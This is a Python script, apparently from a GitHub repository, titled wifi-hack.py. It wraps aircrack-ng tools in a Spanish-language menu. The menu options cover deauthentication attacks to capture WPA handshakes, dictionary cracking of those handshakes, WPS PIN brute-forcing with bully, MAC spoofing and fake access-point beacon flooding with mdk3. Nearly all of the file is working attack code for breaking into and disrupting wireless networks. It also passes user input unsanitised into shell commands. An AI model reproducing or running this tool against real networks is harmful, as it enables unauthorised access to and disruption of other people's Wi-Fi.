-
Notifications
You must be signed in to change notification settings - Fork 56
/
wifi-hack.py
184 lines (164 loc) · 6.99 KB
/
wifi-hack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
from banner.banner import *
def slowly(s):
try:
time.sleep(1)
for w in s + '\n' :
sys.stdout.write(w)
sys.stdout.flush()
time.sleep(7. / 100)
print('\n')
time.sleep(2)
except KeyboardInterrupt:
time.sleep(1)
slowly(FAIL+'Exiting...')
print('\n')
sys.exit(0)
############################################################
print(" \033[1;37mIntroduzca una opción: ")
WH = int(input(" \033[1;32m>> \033[1;37m"))
if WH == 1:
os.system("clear")
banner()
print(" \033[1;37mIngrese la interfaz: (\033[0;37mwlan\033[0;31m0 \033[1;37m| \033[0;37mwlan\033[0;34m1\033[1;37m)")
interfaz = input(" \033[1;32m>> \033[0;37m")
comando = "airmon-ng start {} && airmon-ng check kill".format(interfaz)
os.system(comando)
os.system("python3 wifi-hack.py")
elif WH == 2:
os.system("clear")
banner()
print(" \033[1;37mIngrese la interfaz: (\033[0;37mwlan\033[0;31m0\033[0;37mmon \033[1;37m| \033[0;37mwlan\033[0;34m1\033[0;37mmon\033[1;37m)\033[0m")
interfaz = input(" \033[1;32m>> \033[0;37m")
comando = "airmon-ng stop {}".format(interfaz)
os.system(comando)
os.system("python3 wifi-hack.py")
elif WH == 3:
os.system("clear")
print("\n\033[0m")
os.system("sudo ifconfig")
time.sleep(3)
os.system("clear")
os.system("python3 wifi-hack.py")
elif WH == 4:
os.system("clear")
banner()
slowly(" \033[1;37mReiniciando red, por favor, espere...\033[0m")
comando = "service networking restart && systemctl start NetworkManager"
os.system(comando)
print(" \033[1;31mProceso finalizado!\033[0m")
time.sleep(2)
os.system("clear")
os.system("python3 wifi-hack.py")
elif WH == 5:
os.system("clear")
banner()
print(" \033[1;37mIngrese la interfaz: (\033[0;37mwlan\033[0;31m0\033[0;37mmon \033[1;37m| \033[0;37mwlan\033[0;34m1\033[0;37mmon\033[1;37m)\033[0m")
interfaz = input(" \033[1;32m>> \033[0;37m")
print("\033[1;37mIngrese el nombre del archivo de salida: (Ej: \033[0;31mredes-output\033[0m\033[1;37m)\033[0m")
archivo_salida = input(" \033[1;32m>> \033[0;37m")
comando = "airodump-ng --write scan-output/{} --output-format csv {}".format(archivo_salida,interfaz)
print("\n \033[1;31m[AVISO] \033[0;37mCuando termine, presione \033[1;37mCTRL + C\033[0m")
time.sleep(3)
try:
os.system(comando)
except KeyboardInterrupt:
print("\n\n \033[1;31m[AVISO] \033[0;37Escaneo detenido, guardando resultados...\033[0m")
time.sleep(2)
finally:
time.sleep(3)
print("\n\033[1;37mLos datos se han guarado en: \033[0;37mscan-output/\033[0;32m{}01.csv\033[0m".format(archivo_salida))
print("\033[1;37m¿Desea volver al menú principal? (\033[0;32my\033[0;37m/\033[0;31mn\033[1;37m):\033[0m")
volver = input(" \033[1;32m>> \033[0;37m").strip().lower()
if volver != 'y':
print("\n\033[1;31m[GOODBYE]\033[0m Saliendo del programa...")
time.sleep(1)
exit(0)
else:
os.system('python3 wifi-hack.py')
elif WH == 6:
os.system("clear")
banner()
print(" \033[1;37mIngrese la interfaz: (\033[0;37mwlan\033[0;31m0\033[0;37mmon \033[1;37m| \033[0;37mwlan\033[0;34m1\033[0;37mmon\033[1;37m)\033[0m")
interfaz = input(" \033[1;32m>> \033[0;37m")
comando = "airodump-ng {}".format(interfaz)
print("\n \033[1;31m[AVISO] \033[0;37mCuando termine, presione \033[1;37mCTRL + C\033[0m")
time.sleep(2)
os.system(comando)
print("\n Ingrese el \033[1;32mBSSID\033[0m del objetivo:")
bssid = str(input(" \033[1;32m>> \033[0;37m"))
print("\n Ingrese el \033[1;32mCHANNEL\033[0m del objetivo:")
channel = int(input(" \033[1;32m>> \033[0;37m"))
print("\n Ingrese la \033[1;32mRUTA\033[0m donde desea guardar el handshake:")
ruta = str(input(" \033[1;32m>> \033[0;37m"))
print("\n Ingrese el número de paquetes (max 10000 | min 0):")
paquetes = int(input(" \033[1;32m>> \033[0;37m"))
comando = "airodump-ng -c {} --bssid {} -w {} {} | xterm -e aireplay-ng -0 {} -a {} {}".format(channel,bssid,ruta,interfaz,paquetes,bssid,interfaz)
os.system(comando)
time.sleep(2)
os.system("clear")
os.system("python3 wifi-hack.py")
elif WH == 7:
os.system("clear")
banner()
print(" \033[1;37mIngrese el handshake:\033[0m")
ruta = str(input(" \033[1;32m>> \033[0;37m"))
print("")
print(" \033[1;37mIngrese el diccionario:\033[0m")
diccionario = str(input(" \033[1;32m>> \033[0;37m"))
comando = "aircrack-ng {} -w {}".format(ruta,diccionario)
os.system(comando)
exit()
elif WH == 8:
os.system("clear")
banner()
print(" \033[1;37mIngrese la interfaz: (\033[0;37mwlan\033[0;31m0\033[0;37mmon \033[1;37m| \033[0;37mwlan\033[0;34m1\033[0;37mmon\033[1;37m)\033[0m")
interfaz = input(" \033[1;32m>> \033[0;37m")
print(" \033[1;37mIngrese el BSSID del AP:")
bssid = input(" \033[1;32m>> \033[0;37m")
print(" \033[1;37mIngrese el canal del AP:")
channel = input(" \033[1;32m>> \033[0;37m")
print(" \033[1;37mIngrese el ESSID del AP:")
essid = input(" \033[1;32m>> \033[0;37m")
comando = "bully {} -b {} -c {} -e {} --force".format(interfaz, bssid, channel, essid)
os.system(comando)
elif WH == 9:
os.system("clear")
banner()
print(" \033[1;37mIntroduzca la interfaz: (\033[0;37mwlan\033[0;31m0 \033[1;37m| \033[0;37mwlan\033[0;34m1\033[1;37m)")
interface = input(" \033[1;32m>> \033[0;37m")
nuevaMAC= input("Introduzca la nueva dirección MAC: \033[1;32m>> \033[0;37m")
os.system(f"ifconfig {interface} down")
print(f"Cambiando la MAC de la interfaz {interface} a {nuevaMAC}")
os.system(f"ifconfig {interface} hw ether {nuevaMAC}")
print(f"La dirección MAC cambio a: {nuevaMAC}")
os.system(f"ifconfig {interface} up")
print("La interfaz esta lista!")
time.sleep(1)
os.system(f"ifconfig {interface}")
time.sleep(4)
os.system("clear")
os.system("python3 wifi-hack.py")
elif WH == 10:
os.system('clear')
banner()
print(" \033[1;37mIntroduzca la interfaz: (\033[0;37mwlan\033[0;31m0 \033[1;37m| \033[0;37mwlan\033[0;34m1\033[1;37m)")
interface = input(" \033[1;32m>> \033[0;37m")
print(" \033[1;37mIntroduzca el canal:")
channel = input(" \033[1;32m>> \033[0;37m")
print(" \033[1;37m¿Desea crear un diccionario de AP falsas? [\033[1;32my\033[0m/\033[1;31mn\033[0m]\033[0m")
crearDic = input(" \033[1;32m>> \033[0;37m")
if crearDic == 'y':
os.system('sudo bash AP_generator.sh')
elif crearDic == 'n':
pass
print("\n\033[1;37m Ingrese la ruta del diccionario\033[0m (default: \033[1;37m/wordlist/fakeAP.txt\033[0m): ")
diccionario = str(input(" \033[1;32m>> \033[0;37m"))
print("\n \033[1;31m[AVISO] \033[0;37mPresione \033[1;37m\033[1;37mCTRL + C \033[0;37mpara detener el ataque\033[0m")
os.system("mdk3 {} b -f {} -a -s 1000 -c {}".format(interface,diccionario,channel))
time.sleep(2)
elif WH == 0:
os.system("clear")
goodbye()
exit()
#END CODE
#Follow me: https://github.com/R3LI4NT